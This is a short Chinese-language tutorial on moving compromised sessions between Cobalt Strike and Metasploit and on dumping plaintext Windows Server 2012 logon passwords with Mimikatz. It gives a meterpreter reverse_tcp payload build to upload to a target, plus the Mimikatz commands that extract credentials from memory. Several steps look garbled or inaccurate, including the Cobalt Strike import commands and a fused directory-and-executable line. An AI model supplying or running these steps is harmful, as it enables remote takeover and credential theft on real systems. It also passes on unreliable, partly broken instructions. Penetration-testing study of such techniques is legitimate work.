问题:cs与msf权限传递,以及mimikatz抓取win2012明文密码。
一、CS与MSF权限传递
CS(Cobalt Strike)和MSF(Metasploit Framework)是两种常用的渗透测试工具,它们都支持在渗透过程中传递权限。以下是两者之间传递权限的一般步骤:
从Metasploit向Cobalt Strike传递会话
1. 在Metasploit中获取会话:使用Metasploit渗透目标系统并获得会话。
2. 启动Metasploit RPC服务:在Metasploit控制台中启动RPC服务,以便Cobalt Strike可以与Metasploit通信。
load msgrpc ServerHost=127.0.0.1 Pass=yourpassword
3. 配置Cobalt Strike:在Cobalt Strike中配置Metasploit RPC设置,使其能够连接到Metasploit的RPC服务。
metasploit_rpc_login("127.0.0.1", 55553, "yourpassword")
4. 传递会话:在Cobalt Strike中使用`metasploit_import`命令导入Metasploit会话。
从Cobalt Strike向Metasploit传递会话
1. 在Cobalt Strike中获取会话:使用Cobalt Strike渗透目标系统并获得会话。
2. 生成Payload:在Metasploit中生成一个Payload,用于接收Cobalt Strike的会话。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port -f exe > payload.exe
3. 在Cobalt Strike中执行Payload:将生成的Payload上传到目标系统并执行,以便Metasploit接收到会话。
4. 接收会话:在Metasploit中配置并监听相应的端口,以接收传递过来的会话。
二、 使用Mimikatz抓取Windows 2012明文密码
Mimikatz是一款强大的工具,用于从Windows系统中提取明文密码、哈希、PIN码等。以下是使用Mimikatz抓取Windows 2012明文密码的步骤:
1. 下载并解压Mimikatz:从GitHub上下载Mimikatz工具,并解压到本地。
2. 以管理员身份运行命令提示符:打开命令提示符,并以管理员身份运行。
3. 执行Mimikatz:导航到Mimikatz所在目录,并启动Mimikatz。
cd path\to\mimikatzmimikatz.exe
4.启用调试特权:在Mimikatz控制台中启用调试特权。
privilege::debug
5. 抓取明文密码:使用以下命令来抓取明文密码。
sekurlsa::logonpasswords